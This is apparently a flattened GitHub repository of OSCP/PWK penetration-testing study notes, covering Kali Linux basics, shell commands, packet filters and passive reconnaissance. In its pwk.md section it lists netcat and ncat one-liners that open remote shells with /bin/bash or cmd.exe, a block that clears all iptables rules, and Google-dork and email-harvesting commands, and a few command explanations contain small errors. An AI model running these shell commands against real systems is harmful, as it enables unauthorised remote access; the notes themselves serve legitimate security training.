├── 2020 ├── 1. Getting Comfortable With Kali Linux.md ├── 2. Command Line Fun.md ├── 3. Practical Tools.md ├── 4. Bash Scripting.md ├── 5. Passive Information Gathering.md └── README.md ├── README.md └── pwk.md /2020/1. Getting Comfortable With Kali Linux.md: -------------------------------------------------------------------------------- 1 | 2 | Getting Comfortable With Kali Linux 3 | ======================================================================================================== 4 | 5 | - Booting Up Kali Linux 6 | `64 Bit Kali is recommended` 7 | 8 | - Changing all the default password using passwd command 9 | `kali@kali:~# passwd` 10 | 11 | - Elevate privelages using sudo command 12 | `kali@kali:~# sudo whoami` 13 | 14 | - The Kali Menu 15 | `All Pentest tools are categoried in kali by there functions in Kali Menu` 16 | 17 | - The Kali Documentation 18 | `Useful For Trouble Shooting & Support` 19 | 20 | - Official Documentation URL 21 | https://docs.kali.org/ 22 | 23 | - Next Resource for support & trouble shooting 24 | https://forums.kali.org/ 25 | 26 | - Quick Reference for tools 27 | https://tools.kali.org/ 28 | 29 | - Bug Report 30 | https://bug.kali.org/ 31 | 32 | - Host the Official Manual Courses (such as kali linux revealed, metasploit unleashed,etc) 33 | https://kali.training 34 | 35 | - Finding Your Way Around Kali 36 | --------------------------------------------------------------------------------------------------------------------------- 37 | 38 | - The Linux FileSystem 39 | ``` 40 | Contains Basic Programs (such as ls, cat): /bin/ 41 | Contains Basic Programs (such as fdisk, makefs): /sbin/ 42 | Contains Temporary Files, typically deleted on boot : /tmp/ 43 | Contains Application (such as apt, nmap): /usr/bin/ 44 | Contains Application Support & Data Files : /usr/share/ 45 | ``` 46 | 47 | - Basic Linux Commands 48 | 49 | - Man Pages : Contains Manual Pages for Different Commands & Tools: 50 | ``` 51 | # Manual contains: Name, Synopsis, Description 52 | kali@kali:~# man ls 53 | ``` 54 | 55 | - Man Page Keyword search: 56 | `kali@kali:~# man -k passwd` 57 | 58 | - Man Page Keyword search using regular expression: 59 | `kali@kali:~# man -k '^passwd$'` 60 | 61 | ``` 62 | # Result 63 | kali@kali:~# passwd (1) - change user password 64 | kali@kali:~# passwd (5) - the password file 65 | ``` 66 | 67 | - Now after finding appropriate result, we can look its manual page: 68 | `kali@kali:~# man 5 passwd` 69 | 70 | - `apropos` : Do keyword search for manual pages, similar to above using `man -k`: 71 | `kali@kali:~# apropos partition` 72 | 73 | - Listing Files 74 | 75 | - To List All Files & Folder: 76 | `kali@kali:~# ls` 77 | 78 | - List Particular File: 79 | `kali@kali:~# ls /etc/apache2/sites-available/*.conf` 80 | 81 | - List Hidden Files & Folder in Single Line: 82 | `kali@kali:~# ls -a1` 83 | 84 | - Changing Directory 85 | `kali@kali:~# cd /usr/share/metasploit-framework/` 86 | 87 | - Print/Echo Present Working Directory 88 | `kali@kali:~# pwd` 89 | 90 | - Changing Directory to Root Path 91 | `kali@kali:~# cd ~` 92 | 93 | - Creating Directories 94 | `kali@kali:~# mkdir notes` 95 | 96 | ``` 97 | # This Command Will Create Two Folder, i.e module & one 98 | kali@kali:~# mkdir module one 99 | ``` 100 | 101 | Note: Whitespaces should be excluded, we can use (-) hypen instead of a space in name 102 | 103 | - Creating Directory which contains whitespace 104 | `kali@kali:~# mkdir "module one"` 105 | 106 | - Navigating Directory Which contains whitespace 107 | `kali@kali:~# cd module\ one/` 108 | 109 | - Moving One Directory Back 110 | `kali@kali:~# cd ..` 111 | 112 | - Moving Two Directory Back 113 | `kali@kali:~# cd ../..` 114 | 115 | - Removing Directory 116 | `kali@kali:~# rm -rf "module one"` 117 | 118 | - Making Directory & It's Sub-directory 119 | `kali@kali:~# mkdir -p test/{recon,exploit,report}` 120 | 121 | ``` 122 | # We Can Verify the Created Directory & Sub-directory Using **ls** 123 | kali@kali:~# ls -1 test/ 124 | 125 | # OUTPUT 126 | recon 127 | exploit 128 | report 129 | ``` 130 | 131 | - Finding Files In Kali Linux 132 | --------------------------------------------------------------------------------------------------------------------------- 133 | 134 | - `which` command: Searches the File in directory defined in $PATH: `echo $PATH` 135 | `which sdb` 136 | 137 | - `locate` command: Quickest Way to find file & directories within the FileSystem 138 | 139 | - Uses `locate.db` to find the file or directory which is updated on a regular basis using Cron Scheduler. 140 | 141 | - Database can be manually updated using this command: `sudo updatedb` 142 | 143 | - Searching file using locate: `locate sdb.exe` 144 | 145 | - `find` command: Most Complex & Flexible Search Tool among the 3 146 | 147 | - Searching a file from Root path that starts with sdb: `find / -name sdb*` 148 | 149 | - Managing Kali Linux Services 150 | --------------------------------------------------------------------------------------------------------------------------- 151 | 152 | - SSH Service: TCP based & listen by default on port 22 153 | 154 | - Start SSH Service: `sudo systemctl start ssh` 155 | 156 | - Verifying Whether SSH Service running or not: `sudo ss -antlp | grep sshd 157 | 158 | - Start SSH Service on Boot: `sudo systemctl enable ssh` 159 | 160 | - HTTP Service: TCP based & listen by default on port 80 161 | 162 | - Start Apache2 Service: `sudo systemctl start apache2` 163 | 164 | - Verifying Whether Apache2 Service running or not: `sudo ss -antlp | grep sshd 165 | 166 | - Start Apache2 Service on Boot: `sudo systemctl enable apache2` 167 | 168 | - To See Table of All Available Services: `systemctl list-unit-files` 169 | 170 | - Searching, Installing & Removing Tools 171 | --------------------------------------------------------------------------------------------------------------------------- 172 | 173 | - Aptitude Manager: Used to install, remove, upgrade tools on debian based systemctl 174 | 175 | - Updating Aptitude Manager: `sudo apt update` 176 | 177 | - Updating Installed Packages & Core System Tools to latest versions: `sudo apt upgrade` 178 | 179 | - Updating Single Package (such as metasploit-framework): `sudo apt upgrade metasploit-framework` 180 | 181 | - `apt-cache search`: Used to search whether a package is available in Kali repository 182 | `apt-cache search pure-ftpd` 183 | 184 | - `apt show`: Used to echo/display description of a package, e.g. `apt show resource-agents | less` 185 | 186 | - `apt install`: Used to Install Package, e.g. `sudo apt install pure-ftpd` 187 | 188 | - `apt remove --purge`: Used to Completely Remove Tool/Package from kali, e.g. `sudo apt remove --purge pure-ftpd` 189 | 190 | - `dpkg`: Core tool used to install package either directly or indirectly through apt 191 | 192 | - prefered for offline package installation: `sudo dpkg -i ./nano_3.2-2_amd64.deb` 193 | -------------------------------------------------------------------------------- /2020/2. Command Line Fun.md: -------------------------------------------------------------------------------- 1 | ## Table of Content 2 | - [Environment Variables](#environment-variables) 3 | * [Comman Environment Variables](#comman-environment-variables) 4 | * [Define Environment Variables using `export` cmd](#define-environment-variables-using-export-cmd) 5 | - [Tab Completion](#tab-completion) 6 | - [Bash History Tricks](#bash-history-tricks) 7 | - [Useful Keyboard Keys](#useful-keyboard-keys) 8 | - [Piping and Redirection](#piping-and-redirection) 9 | * [Redirecting to a new file](#redirecting-to-a-new-file) 10 | * [Redirecting to a existing file](#redirecting-to-a-existing-file) 11 | * [Redirecting from a file](#redirecting-from-a-file) 12 | * [Redirecting STDERR](#redirecting-stderr) 13 | * [Piping](#piping) 14 | - [Text Searching and Manipulation](#text-searching-and-manipulation) 15 | * [`grep`](#grep) 16 | * [`see`](#sed) 17 | * [`cut`](#cut) 18 | * [`awk`](#awk) 19 | - [Editing files from the Command Line](#editing-files-from-the-command-line) 20 | * [`nano`](#nano) 21 | * [`vi`](#vi) 22 | - [Comparing Files](#comparing-files) 23 | * [`comm`](#comm) 24 | * [`diff`](#diff) 25 | * [`vimdiff`](#vimdiff) 26 | - [Managing Processes](#managing-processes) 27 | * [Backgrounding Processes (bg)](#backgrounding-processes-bg) 28 | * [Jobs Controls (jobs and fg)](#jobs-controls-jobs-and-fg) 29 | * [Process Control (ps and kill)](#process-control-ps-and-kill) 30 | - [File and Command Monitoring](#file-and-command-monitoring) 31 | * [`tail`](#tail) 32 | * [`watch`](#watch) 33 | - [Downloading Files](#downloading-files) 34 | * [`wget`](#wget) 35 | * [`curl`](#curl) 36 | * [`axel`](#axel) 37 | - [Customizing the Bash Environment](#customizing-the-bash-environment) 38 | * [Bash History Customization](#bash-history-customization) 39 | * [Alias](#alias) 40 | * [Persistent Bash Customization](#persistent-bash-customization) 41 | 42 | Command Line Fun 43 | ================= 44 | Introductory Look to Popular Linux Command Line Program 45 | 46 | Environment Variables 47 | --------------------- 48 | * When opening a terminal window, new bash process which has it's own Bash Environment Variables are initialised. 49 | * Environment Variables: Form of Global storage inherited by any application which will run during terminal session 50 | 51 | ### Comman Environment Variables: 52 | 53 | 1. PATH : `kali@kali:~$ echo $PATH` 54 | 2. USER : `kali@kali:~$ echo $USER` 55 | 3. HOME : `kali@kali:~$ echo $HOME` 56 | 4. PWD : `kali@kali:~$ echo $PWD` 57 | 58 | ### Define Environment Variables using `export` cmd 59 | * Let's say you don't want to type IP address repeatedly then you can export the `$ip` variable & can use it across terminal sessions 60 | ``` 61 | kali@kali:~$ export $ip=192.168.43.70 62 | kali@kali:~$ ping -c 2 $ip 63 | ``` 64 | 65 | * Variables exported without `export` cmd are only accessible in that current bash session 66 | ``` 67 | kali@kali:~$ lol="Rasode Mein Kon Tha?" 68 | kali@kali:~$ echo $lol # We will get value of $lol 69 | kali@kali:~$ bash 70 | kali@kali:~$ echo $lol # No Value 71 | kali@kali:~$ exit 72 | kali@kali:~$ echo $lol # Again can access value of $lol 73 | ``` 74 | * **NOTE**: Variables defined using `export` cmd can be accessed using different terminal window 75 | 76 | * Viewing Default Kali Linux Environment Variables: `env` 77 | 78 | Tab Completion 79 | -------------- 80 | * Used in auto text completion. 81 | 82 | Bash History Tricks 83 | ------------------- 84 | * We can see previous executed cmds using `history` cmd 85 | 86 | * For executing last executed terminal cmd, use `!!` double exclamation mark. 87 | 88 | * Bash terminal history is saved in `.bash_history` file in the user home directory: `tail -n 3 .bash_history` 89 | 90 | * Two Common Env Variables: 91 | 1. `$HISTSIZE` : Controls no. Of cmds stored in memory for current terminal session. 92 | 2. `$HISTFILESIZE` : Controls How many cmds are kept in history file. 93 | 94 | * These 2 env variables can be edited according to are needs. 95 | 96 | Useful Keyboard Keys 97 | -------------------- 98 | 1. `Up ArrowKey`: Use to select/scroll previous cmds in Upwards direction. 99 | 2. `Down ArrowKey`: Use to select/scroll cmds in Downwards direction. 100 | 3. `CTRL + R`: Reverse I search facility, can search previously executed cmds using Cmd Search Feature. 101 | 102 | Piping and Redirection 103 | ---------------------- 104 | * Every program executed from terminal has 3 streams connected to it that serves the communication channel to external env. 105 | 1. Standard Input (`STDIN`): Data fed into the program. 106 | 2. Standard Output (`STDOUT`): Output from the program. (defaults to terminal) 107 | 3. Standard Error (`STDERR`): Error message. (defaults to terminal) 108 | 109 | ### Redirecting to a new file 110 | 111 | * Redirecting output to a non existing file will leads to file creation: `kali@kali:~$ echo "Corona Go! Go Corona" > EminemRap.txt` 112 | Typical file reading: `kali@kali:~$ cat EminemRap.txt` 113 | 114 | * If file already exist, then that file will be overwritted: `kali@kali:~$ echo "Selfie meinai leli aaj" > EminemRap.txt` 115 | 116 | * **Note** : Be very careful while file redirection, there is no undo function. 117 | 118 | ### Redirecting to a existing file 119 | * Use `>>` sign to append data to a existing file: `kali@kali:~$ echo "Chura ke dil mera goliya chali" >> EminemRap.txt` 120 | 121 | ### Redirecting from a file 122 | * Use `<` sign to redirect file data to any utility: `kali@kali:~$ wc -m < EminemRap.txt` 123 | * Above cmd will count total words a file. 124 | 125 | ### Redirecting STDERR 126 | * We can redirect standard error of particular command using `2>`: `kali@kali:~$ ls . /test 2>error.txt` 127 | * Example content of error.txt file: `ls: cannot excess './test': No such file or directory` 128 | 129 | ### Piping 130 | * Redirecting output of one cmd as a input for another cmd: `kali@kali:~$ cat error.txt | wc -m` 131 | * Above cmd will perforn word count of `error.txt` file. 132 | 133 | `kali@kali:~$ cat error.txt | wc -m > count.txt` 134 | `kali@kali:~$ cat count.txt` 135 | 136 | Text Searching and Manipulation 137 | ------------------------------- 138 | ### `grep` 139 | * Searches text file for given regex & outputs any line containing a match to stdout (stdout == usually terminal) 140 | * Example: `kali@kali:~$ ls -la /usr/bin | grep zip` 141 | * Use `man` cmd to learn more about `grep` 142 | 143 | ### `sed` 144 | * Powerful stream editor + very complex. It performs text editing in stream of text. 145 | * Example: `kali@kali:~$ echo "Go Katrina! Go" | sed 's/Katrina/Corona/' ` 146 | * Example Output: `Go Corona! Go` 147 | 148 | ### `cut` 149 | * Used to cut a stdout of one cmd to pieces on the basic of given delimiter, then it also be used to select a particular part of string. 150 | * Commonly used flags: `-d` for Delimiter & `-f` for Field Selection. 151 | * Example: `kali@kali:~$ echo rahul, saksham, rohit | cut -d "," -f 2` 152 | * Example Output: `saksham` 153 | * Extracting list of users from etc/passed file: `kali@kali:~$ cut -d ":" -f 1 /etc/passwd ` 154 | 155 | ### `awk` 156 | * Programming language designed for text processing. 157 | * Typically used for data extraction and reporting tools. 158 | * Only going to scratch the surface. 159 | * Splitting stdout of one cmd using delimeter, Extracting 1st & 3rd part & then finally printing it: `kali@kali:~$ echo "hello::there::friends" | awk -F "::" '{print $1, $3}' ` 160 | * Example Output: `hello, friends` 161 | 162 | Editing files from the Command Line 163 | ----------------------------------- 164 | ### `nano` 165 | * Opening file using `nano`: `nano anyfilename.txt` 166 | * Nano commands menu is located at the bottom. 167 | * Important Memorable cmds: 168 | - `CTRL + O` : Write changes to a file. 169 | - `CTRL + K` : To cut current line. 170 | - `CTRL + U` : To uncut a line & paste it at cursor location. 171 | - `CTRL + W`: To search within a line. 172 | - `CTRL + X` : Use to exit. 173 | 174 | ### `vi` 175 | * Opening file using `vi`: `vi anyfilename.txt` 176 | * Press `i` key to Escape Command Mode & start typing in text file. 177 | * Press `esc` key in order to return back to Command Mode. 178 | * Press `dd` to remove the current line. 179 | * Press `yy` to copy the current line. 180 | * Press `p` to paste the clipboard context. 181 | * Press `x` to delete the current character under the cursor. 182 | * Press `:w` to write current file to disk & remain open in `vi` 183 | * Press `:q!` to quit without writing a file. 184 | * Press `:wq!` to quickly save the file & quit `vi` 185 | 186 | Comparing Files 187 | --------------- 188 | ### `comm` 189 | * Compares two text file, displaying the line that are unique to each one as well those lines that are common. 190 | * Example File-A & File-B: 191 | ``` 192 | kali@kali:~$ cat File-A.txt 193 | 192.168.1.1 194 | 192.168.1.2 195 | 192.168.1.3 196 | 192.168.1.4 197 | 192.168.1.5 198 | kali@kali:~$ cat File-B.txt 199 | 192.168.1.1 200 | 192.168.1.3 201 | 192.168.1.4 202 | 192.168.1.5 203 | 192.168.1.6 204 | ``` 205 | 206 | * File Comparison example using `comm`: 207 | ``` 208 | kali@kali:~$ comm File-A.txt File-B.txt 209 | 192.168.1.1 210 | 192.168.1.2 211 | 192.168.1.3 212 | 192.168.1.4 213 | 192.168.1.5 214 | 192.168.1.6 215 | ``` 216 | * `192.168.1.2` is unique to 1st file, thus it is displayed in 1st column. 217 | * `192.168.1.6` is unique to 2nd file, thus it is displayed in 2nd column. 218 | * Rest all common IPs/Lines are displayed in the 3rd column. 219 | * `-1` , `-2` and `-3` flags could be given to `comm` in order to suppress 1st, 2nd or 3rd column, according to our need. For example: 220 | ``` 221 | kali@kali:~$ comm -12 File-A.txt File-B.txt 222 | 192.168.1.1 223 | 192.168.1.3 224 | 192.168.1.4 225 | 192.168.1.5 226 | ``` 227 | 228 | ### `diff` 229 | * Compares difference b/w files similar to `comm`, but it is more complex & support many output formats. 230 | * Two famous Formats: 231 | 1. Context Format: `kali@kali:~$ diff -c File-A.txt File-B.txt` 232 | 2. Unified Format: `kali@kali:~$ diff -u File-A.txt File-B.txt` 233 | 234 | ### `vimdiff` 235 | * It open vim (extended version of vi), with multiple files, one in each window. 236 | * Difference b/w files is highlighted, making it easier to inspect them. 237 | 238 | - Useful shortcuts: 239 | * Press `CTRL + W + Arrow Key` for switching b/w windows 240 | * Press `] + C` will jump the cursor to next change in the diff. 241 | * `[ + C` will jump it to the previous change. 242 | * Press `D + O` will get a change in other window and put it in current window. 243 | * Press `D + P` will put the change in other window from the current one. 244 | * Press `:q!` for quitting vimdiff (Same shortcuts as vi) 245 | 246 | Managing Processes 247 | ------------------ 248 | * Linux kernel manages multitasking through the use of process. 249 | * Kernel maintains info about each processes to help keep things organised. 250 | * Each process is assigned a no. called `process id` 251 | 252 | * Linux shell introduces the concept of `jobs` to ease our workflow during terminal session. For ex: `kali@kali:~$ cat errors.txt | wc -m` This whole cmd will be considered as one `job`. 253 | 254 | * `jobs` helps us to suspend or resume the execution of particular cmd. 255 | 256 | ### Backgrounding Processes (bg) 257 | * Helps us to make the execution of cmd in background, leaving the shell free for further use. 258 | * `&` sign at the end of a cmd, will put the cmd in bg. 259 | 260 | Ex: `kali@kali:~$ ping -c 400 localhost > ping_result.txt &` 261 | 262 | * Stopping the execution of cmd using `CTRL + Z` and then typing `bg` cmd will run the last cmd in background. Ex: `kali@kali:~$ bg` 263 | 264 | ### Jobs Controls (jobs and fg) 265 | * `jobs` utility list the jobs that are running in current terminal session. 266 | * Running `fg %JOBNumber` returns a job in foreground. Example: `fg %1` 267 | * If only one job running in the bg, then typing `fg` without any additional flag will return that single job in the foreground. 268 | 269 | ### Process Control (ps and kill) 270 | * `ps` : Process status, list all the running process in a Linux/Unix system, Swizz army knife for process management. 271 | * Listing all process with full format listing: `kali@kali:~$ ps -ef` where `-e` & `-f` stands for `select all processes` and `full format listing` respectively. 272 | 273 | * Finding process Id using command name: `kali@kali:~$ ps -fC leafpad` 274 | 275 | * Killing process using process id: `kali@kali:~$ kill ProcessID` 276 | 277 | * Verifying process termination using `ps`: `kali@kali:~$ ps -fC leafpad` 278 | 279 | File and Command Monitoring 280 | --------------------------- 281 | ### `tail` 282 | * Monitoring apache logs using tail: `kali@kali:~$ sudo tail -f /var/log/apache2/access.log` 283 | * Extracting last `2` lines from file: `kali@kali:~$ sudo tail -n2 /etc/lsb-release` where `2` is the desired no. of last lines. 284 | 285 | ### `watch` 286 | * Used to run designated cmd at regular intervals, by default it runs for every 2 seconds which could be changed using `-nX` flag where `X` is the interval in seconds. 287 | * Example (This cmd will list logged in users output from the `w` cmd once very 5 seconds) : `kali@kali:~$ watch -n 5 w` 288 | 289 | Downloading Files 290 | ----------------- 291 | ### `wget` 292 | * Utility to download file from the internet. 293 | * Example (Downloading file & saving it with different name) : `kali@kali:~$ wget -O lol.txt https://example.com/text file.txt` 294 | * Refer to its docs for more info: `kali@kali:~$ wget --help | less` 295 | 296 | ### `curl` 297 | * Use to transfer data to and from a server using a host of protocol. 298 | * Can be used to Download and Upload files & build complex request. 299 | * Example (Download & save file with different name) : `kali@kali:~$ curl -o lol.txt https://example.com/textfile.txt` 300 | * Very versatile tool, lots of use case scenarios & ample docs are available online. 301 | 302 | ### `axel` 303 | * It is Download accelerator that transfers a file from an FTP or HTTP server through multiple connections. 304 | * It has vast variety of options. Common option: `kali@kali:~$ axel -a -n 20 -o lol.pdf https://example.com/lol.pdf` 305 | * `-a` : For more concise progress indicator. 306 | * `-n` : For no. Of multiple connections to use. 307 | * `-o` : For different output name. 308 | 309 | * Extremely useful for downloading large file. 310 | 311 | Customizing the Bash Environment 312 | -------------------------------- 313 | ### Bash History Customization 314 | * Whether or not to remove duplicate cmds: `kali@kali:~$ export HISTCONTROL=ignoredups` 315 | * Filtering out basic cmds : `kali@kali:~$ export HISTIGNORE="&:ls:[bf]g:exit:history"` 316 | * For showing TimeFormat in history output cmd: `kali@kali:~$ export HISTTIMEFORMAT="%F %T"` 317 | Other time format can be found in strftime man page: `kali@kali:~$ man strfman` 318 | 319 | ### Alias 320 | * Defining large cmd to shorter name 321 | * Example: `kali@kali:~$ alias lsa=ls -la` 322 | * We can see defined alias using `kali@kali:~$ alias` cmd without giving any argument/flag. 323 | 324 | ### Persistent Bash Customization 325 | * Behavior of interactive shell in bash is determined by system's `/etc/bash.bashrc` file. 326 | * Editing this `bash.bashrc` bash file, will leads to persistent bash customization. 327 | 328 | 329 | -------------------------------------------------------------------------------- /2020/3. Practical Tools.md: -------------------------------------------------------------------------------- 1 | Practical Tools 2 | =============== 3 | -------------------------------------------------------------------------------- /2020/4. Bash Scripting.md: -------------------------------------------------------------------------------- 1 | Bash Scripting 2 | ============== 3 | -------------------------------------------------------------------------------- /2020/5. Passive Information Gathering.md: -------------------------------------------------------------------------------- 1 | Passive Information Gathering 2 | ============================= 3 | -------------------------------------------------------------------------------- /2020/README.md: -------------------------------------------------------------------------------- 1 | 2 | # OSCP - PWK 2020 (Penetration testing With Kali) NOTES 3 | OSCP Notes which covers whole PWK 2020 Course Curriculum 4 | > Written By: Pushpender Singh 5 | 6 | ## Table of Content 7 | - [Getting Comfortable With Kali Linux](https://github.com/PushpenderIndia/oscp-notes/blob/master/2020/1.%20Getting%20Comfortable%20With%20Kali%20Linux.md) 8 | - [Command Line Fun](https://github.com/PushpenderIndia/oscp-notes/blob/master/2020/2.%20Command%20Line%20Fun.md) 9 | - [Practical Tools](https://github.com/PushpenderIndia/oscp-notes/blob/master/2020/3.%20Practical%20Tools.md) 10 | - [Bash Scripting](https://github.com/PushpenderIndia/oscp-notes/blob/master/2020/4.%20Bash%20Scripting.md) 11 | - [Passive Information Gathering](https://github.com/PushpenderIndia/oscp-notes/blob/master/2020/5.%20Passive%20Information%20Gathering.md) 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSCP Notes Written From PWK (Penetration testing With Kali) Course Material 2 | > Written By: Pushpender Singh 3 | 4 | ## Table of Contents 5 | - [PWK Old Notes](https://github.com/PushpenderIndia/oscp-notes/blob/master/pwk.md) 6 | - [PWK 2020 Notes](https://github.com/PushpenderIndia/oscp-notes/blob/master/2020/README.md) 7 | 8 | `Remember : Enumeration is the KEY : )` 9 | 10 | ### **Try Harder** 11 | -------------------------------------------------------------------------------- /pwk.md: -------------------------------------------------------------------------------- 1 | # OSCP - PWK (PenTesting With Kali) NOTES 2 | Full OSCP Notes which completes whole OSCP Course Curriculum 3 | 4 | ## Table of Contents 5 | - [Kali Linux](#kali-linux) 6 | - [Information Gathering & Vulnerability Scanning](#information-gathering--vulnerability-scanning) 7 | * [Passive Information Gathering](#passive-information-gathering) 8 | * [Active Information Gathering](#active-information-gathering) 9 | * [Port Scanning](#port-scanning) 10 | * [Enumeration](#enumeration) 11 | * [HTTP Enumeration](#http-enumeration) 12 | - [Buffer Overflows and Exploits](#buffer-overflows-and-exploits) 13 | - [Shells](#shells) 14 | - [File Transfers](#file-transfers) 15 | - [Privilege Escalation](#privilege-escalation) 16 | * [Linux Privilege Escalation](#linux-privilege-escalation) 17 | * [Windows Privilege Escalation](#windows-privilege-escalation) 18 | - [Client, Web and Password Attacks](#client-web-and-password-attacks) 19 | * [Client Attacks](#client-attacks) 20 | * [Web Attacks](#web-attacks) 21 | * [File Inclusion Vulnerabilities LFI/RFI](#file-inclusion-vulnerabilities) 22 | * [Database Vulnerabilities](#database-vulnerabilities) 23 | * [Password Attacks](#password-attacks) 24 | * [Password Hash Attacks](#password-hash-attacks) 25 | - [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling) 26 | - [The Metasploit Framework](#the-metasploit-framework) 27 | - [Bypassing Antivirus Software](#bypassing-antivirus-software) 28 | 29 | Kali Linux 30 | ======================================================================================================== 31 | 32 | - Set the Target IP Address to the `$ip` system variable 33 | `export ip=192.168.1.100` 34 | 35 | - Find the location of a file 36 | `locate sbd.exe` 37 | 38 | - Search through directories in the `$PATH` environment variable 39 | `which sbd` 40 | 41 | - Find a search for a file that contains a specific string in it’s 42 | name: 43 | `find / -name sbd\*` 44 | 45 | - Show active internet connections 46 | `netstat -lntp` 47 | 48 | - Change Password 49 | `passwd` 50 | 51 | - Verify a service is running and listening 52 | `netstat -antp |grep apache` 53 | 54 | - Start a service 55 | `systemctl start ssh ` 56 | 57 | `systemctl start apache2` 58 | 59 | - Have a service start at boot 60 | `systemctl enable ssh` 61 | 62 | - Stop a service 63 | `systemctl stop ssh` 64 | 65 | - Unzip a gz file 66 | `gunzip access.log.gz` 67 | 68 | - Unzip a tar.gz file 69 | `tar -xzvf file.tar.gz` 70 | 71 | - Search command history 72 | `history | grep phrase_to_search_for` 73 | 74 | - Download a webpage 75 | `wget http://www.cisco.com` 76 | 77 | - Open a webpage 78 | `curl http://www.cisco.com` 79 | 80 | - String manipulation 81 | 82 | - Count number of lines in file 83 | `wc -l index.html` 84 | 85 | - Get the start or end of a file 86 | `head index.html` 87 | 88 | `tail index.html` 89 | 90 | - Extract all the lines that contain a string 91 | `grep "href=" index.html` 92 | 93 | - Cut a string by a delimiter, filter results then sort 94 | `grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u` 95 | 96 | - Using Grep and regular expressions and output to a file 97 | `cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > list.txt` 98 | 99 | - Use a bash loop to find the IP address behind each host 100 | `for url in $(cat list.txt); do host $url; done` 101 | 102 | - Collect all the IP Addresses from a log file and sort by 103 | frequency 104 | `cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn` 105 | 106 | - Decoding using Kali 107 | 108 | - Decode Base64 Encoded Values 109 | 110 | `echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode` 111 | 112 | - Decode Hexidecimal Encoded Values 113 | `echo -n "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874" | xxd -r -ps` 114 | 115 | - Netcat - Read and write TCP and UDP Packets 116 | 117 | - Download Netcat for Windows (handy for creating reverse shells and transfering files on windows systems): 118 | [https://joncraton.org/blog/46/netcat-for-windows/](https://joncraton.org/blog/46/netcat-for-windows/) 119 | 120 | - Connect to a POP3 mail server 121 | `nc -nv $ip 110` 122 | 123 | - Listen on TCP/UDP port 124 | `nc -nlvp 4444` 125 | 126 | - Connect to a netcat port 127 | `nc -nv $ip 4444` 128 | 129 | - Send a file using netcat 130 | `nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe` 131 | 132 | - Receive a file using netcat 133 | `nc -nlvp 4444 > incoming.exe` 134 | 135 | - Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that... 136 | 137 | whereis nc 138 | nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz 139 | 140 | /bin/nc.traditional -e /bin/bash 1.2.3.4 4444 141 | 142 | 143 | - Create a reverse shell with Ncat using cmd.exe on Windows 144 | `nc.exe -nlvp 4444 -e cmd.exe` 145 | 146 | or 147 | 148 | `nc.exe -nv -e cmd.exe` 149 | 150 | - Create a reverse shell with Ncat using bash on Linux 151 | `nc -nv $ip 4444 -e /bin/bash` 152 | 153 | - Netcat for Banner Grabbing: 154 | 155 | `echo "" | nc -nv -w1 ` 156 | 157 | - Ncat - Netcat for Nmap project which provides more security avoid 158 | IDS 159 | 160 | - Reverse shell from windows using cmd.exe using ssl 161 | `ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl` 162 | 163 | - Listen on port 4444 using ssl 164 | `ncat -v $ip 4444 --ssl` 165 | 166 | - Wireshark 167 | - Show only SMTP (port 25) and ICMP traffic: 168 | 169 | `tcp.port eq 25 or icmp` 170 | 171 | - Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet: 172 | 173 | `ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16` 174 | 175 | - Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs: 176 | 177 | `ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip` 178 | 179 | - Some commands are equal 180 | 181 | `ip.addr == xxx.xxx.xxx.xxx` 182 | 183 | Equals 184 | 185 | `ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx ` 186 | 187 | ` ip.addr != xxx.xxx.xxx.xxx` 188 | 189 | Equals 190 | 191 | `ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx` 192 | 193 | - Tcpdump 194 | 195 | - Display a pcap file 196 | `tcpdump -r passwordz.pcap` 197 | 198 | - Display ips and filter and sort 199 | `tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head` 200 | 201 | - Grab a packet capture on port 80 202 | `tcpdump tcp port 80 -w output.pcap -i eth0` 203 | 204 | - Check for ACK or PSH flag set in a TCP packet 205 | `tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap` 206 | 207 | - IPTables 208 | 209 | - Deny traffic to ports except for Local Loopback 210 | 211 | `iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP ` 212 | 213 | `iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP` 214 | 215 | - Clear ALL IPTables firewall rules 216 | 217 | ```bash 218 | iptables -P INPUT ACCEPT 219 | iptables -P FORWARD ACCEPT 220 | iptables -P OUTPUT ACCEPT 221 | iptables -t nat -F 222 | iptables -t mangle -F 223 | iptables -F 224 | iptables -X 225 | iptables -t raw -F iptables -t raw -X 226 | ``` 227 | 228 | Information Gathering & Vulnerability Scanning 229 | =================================================================================================================================== 230 | 231 | - Passive Information Gathering 232 | --------------------------------------------------------------------------------------------------------------------------- 233 | 234 | - Google Hacking 235 | 236 | - Google search to find website sub domains 237 | `site:microsoft.com` 238 | 239 | - Google filetype, and intitle 240 | `intitle:"netbotz appliance" "OK" -filetype:pdf` 241 | 242 | - Google inurl 243 | `inurl:"level/15/sexec/-/show"` 244 | 245 | - Google Hacking Database: 246 | https://www.exploit-db.com/google-hacking-database/ 247 | 248 | - SSL Certificate Testing 249 | [https://www.ssllabs.com/ssltest/analyze.html](https://www.ssllabs.com/ssltest/analyze.html) 250 | 251 | - Email Harvesting 252 | 253 | - Simply Email 254 | `git clone https://github.com/killswitch-GUI/SimplyEmail.git ` 255 | 256 | `./SimplyEmail.py -all -e TARGET-DOMAIN` 257 | 258 | - Netcraft 259 | 260 | - Determine the operating system and tools used to build a site 261 | https://searchdns.netcraft.com/ 262 | 263 | - Whois Enumeration 264 | `whois domain-name-here.com ` 265 | 266 | `whois $ip` 267 | 